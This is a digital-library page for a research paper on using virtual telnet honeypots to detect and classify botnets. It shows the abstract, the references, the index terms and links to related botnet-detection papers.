ABSTRACT
Despite recommendations to not use telnet, there is an increasing number of telnet-based botnets and a need to analyse these attacks. We deployed a network of high interaction honeypots that simulate telnet devices. From the collected data, we created a dataset that we analysed from different perspectives. In this paper, we focus on the infection phase of botnets. Based on the found signatures collected by our samples, we can divide the botnets into 9 families. We show dependencies between commands, and between commands and directories used to propagate botnets.
- Kishore Angrishi. 2017. Turning internet of things (iot) into internet of vulnerabilities (iov): Iot botnets. arXiv preprint arXiv: 1702.03681 (2017).Google Scholar
- Basil AsSadhan, José MF Moura, David Lapsley, Christine Jones, and W Timothy Strayer. 2009. Detecting botnets using command and control traffic. In 2009 Eighth IEEE International Symposium on Network Computing and Applications. IEEE, 156--162. Google ScholarDigital Library
- James R Binkley and Suresh Singh. 2006. An Algorithm for Anomaly-based Botnet Detection. SRUTI 6 (2006), 7--7. Google ScholarDigital Library
- William B Cavnar, John M Trenkle, et al. 1994. N-gram-based text categorization. Ann arbor mi 48113, 2 (1994), 161--175.Google Scholar
- Cymmetria. 2017. Honeypot MTPot. Retrieved July 8, 2018 from https://github.com/Cymmetria/MTPotGoogle Scholar
- Victor GT da Costa, Sylvio Barbon, Rodrigo S Miani, Joel JPC Rodrigues, and Bruno B Zarpelão. 2017. Detecting mobile botnets through machine learning and system calls analysis. In Communications (ICC), 2017 IEEE International Conference on. IEEE, 1--6.Google ScholarCross Ref
- Meisam Eslahi, Wardah Zainal Abidin, and Maryam Var Naseri. 2017. Correlation-based HTTP Botnet detection using network communication histogram analysis. In Application, Information and Network Security (AINS), 2017 IEEE Conference on. IEEE, 7--12.Google ScholarCross Ref
- Meisam Eslahi, Rosli Salleh, and Nor Badrul Anuar. 2012. Bots and botnets: An overview of characteristics, detection and challenges. In Control System, Computing and Engineering (ICCSCE), 2012 IEEE International Conference on. IEEE, 349--354.Google ScholarCross Ref
- Pierce M Gibbs. 2014. Botnet Tracking Tools. SANS Inst (2014).Google Scholar
- Jan Goebel and Thorsten Holz. 2007. Rishi: Identify Bot Contaminated Hosts by IRC Nickname Evaluation. HotBots 7 (2007), 8--8. Google ScholarDigital Library
- Guofei Gu, Roberto Perdisci, Junjie Zhang, and Wenke Lee. 2008. Botminer: Clustering analysis of network traffic for protocol-and structure-independent botnet detection. (2008).Google Scholar
- Guofei Gu, Junjie Zhang, and Wenke Lee. 2008. BotSniffer: Detecting botnet command and control channels in network traffic. (2008).Google Scholar
- RC Joshi and Anjali Sardana. 2011. Honeypots: a new paradigm to information security. CRC Press. Google ScholarDigital Library
- Jehyun Lee, Jonghun Kwon, Hyo-Jeong Shin, and Heejo Lee. 2010. Tracking multiple C&C botnets by analyzing DNS traffic. In Secure Network Protocols (NPSec), 2010 6th IEEE Workshop on. IEEE, 67--72.Google ScholarCross Ref
- Liang Lu, Yaokai Feng, and Kouichi Sakurai. 2017. C&C session detection using random forest. In Proceedings of the 11th International Conference on Ubiquitous Information Management and Communication. ACM, 34. Google ScholarDigital Library
- Sergii Lysenko, Oleg Savenko, Kira Bobrovnikova, Andrii Kryshchuk, and Bohdan Savenko. 2017. Information technology for botnets detection based on their behaviour in the corporate area network. In International Conference on Computer Networks. Springer, 166--181.Google ScholarCross Ref
- Mohammad M Masud, Tahseen Al-Khateeb, Latifur Khan, Bhavani Thuraisingham, and Kevin W Hamlen. 2008. Flow-based identification of botnet traffic by mining multiple log files. In Distributed Framework and Applications, 2008. DFmA 2008. First International Conference on. IEEE, 200--206.Google ScholarCross Ref
- Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, Tsutomu Matsumoto, Takahiro Kasama, and Christian Rossow. 2015. IoTPOT: analysing the rise of IoT compromises. EMU 9 (2015), 1.Google Scholar
- Karl Pearson. 1895. Note on regression and inheritance in the case of two parents. Proceedings of the Royal Society of London 58 (1895), 240--242.Google ScholarCross Ref
- Niels Provos and Thorsten Holz. 2007. Virtual honeypots: from botnet tracking to intrusion detection. Pearson Education. Google ScholarDigital Library
- Miroslav Stampar. 2017. Honeypot HonTel. Retrieved July 8, 2018 from https://github.com/stamparm/hontelGoogle Scholar
- Richard Taylor. 1990. Interpretation of the correlation coefficient: a basic review. Journal of diagnostic medical sonography 6, 1 (1990), 35--39.Google ScholarCross Ref
- Ivo Van der Elzen and Jeroen van Heugten. 2017. Techniques for detecting compromised IoT devices. University of Amsterdam (2017).Google Scholar
- Nicholas Wells. 2000. Busybox: A swiss army knife for linux. Linux Journal 2000, 78es (2000), 10. Google ScholarDigital Library
- Jeffery Wilkins. 2015. Honeypot HoneyWRT. Retrieved July 8, 2018 from https://github.com/CanadianJeff/honeywrtGoogle Scholar
- Matej Zuzcak and Tomas Sochor. 2017. Behavioral analysis of bot activity in infected systems using honeypots. In International Conference on Computer Networks. Springer, 118--133.Google ScholarCross Ref
Index Terms
- Virtual honeypots and detection of telnet botnets
Recommendations
An empirical study of botnets on university networks using low-interaction honeypots
ACMSE '13: Proceedings of the 51st ACM Southeast ConferenceMalware and Botnets in particular have risen to be premier threats to computing assets. As computer criminals continue to improve their attack methods it is essential that the security community have tools at their disposal to quickly identify and ...
Spamming botnets: signatures and characteristics
In this paper, we focus on characterizing spamming botnets by leveraging both spam payload and spam server traffic properties. Towards this goal, we developed a spam signature generation framework called AutoRE to detect botnet-based spam emails and ...
Correlation Analysis between Spamming Botnets and Malware Infected Hosts
SAINT '11: Proceedings of the 2011 IEEE/IPSJ International Symposium on Applications and the InternetMany of recent cyber attacks are being launched by botnets for the purpose of carrying out large-scale cyber attacks such as spam emails, Distributed Denial of Service (DDoS), network scanning and so on. In many cases, these botnets consist of a lot of ...
Comments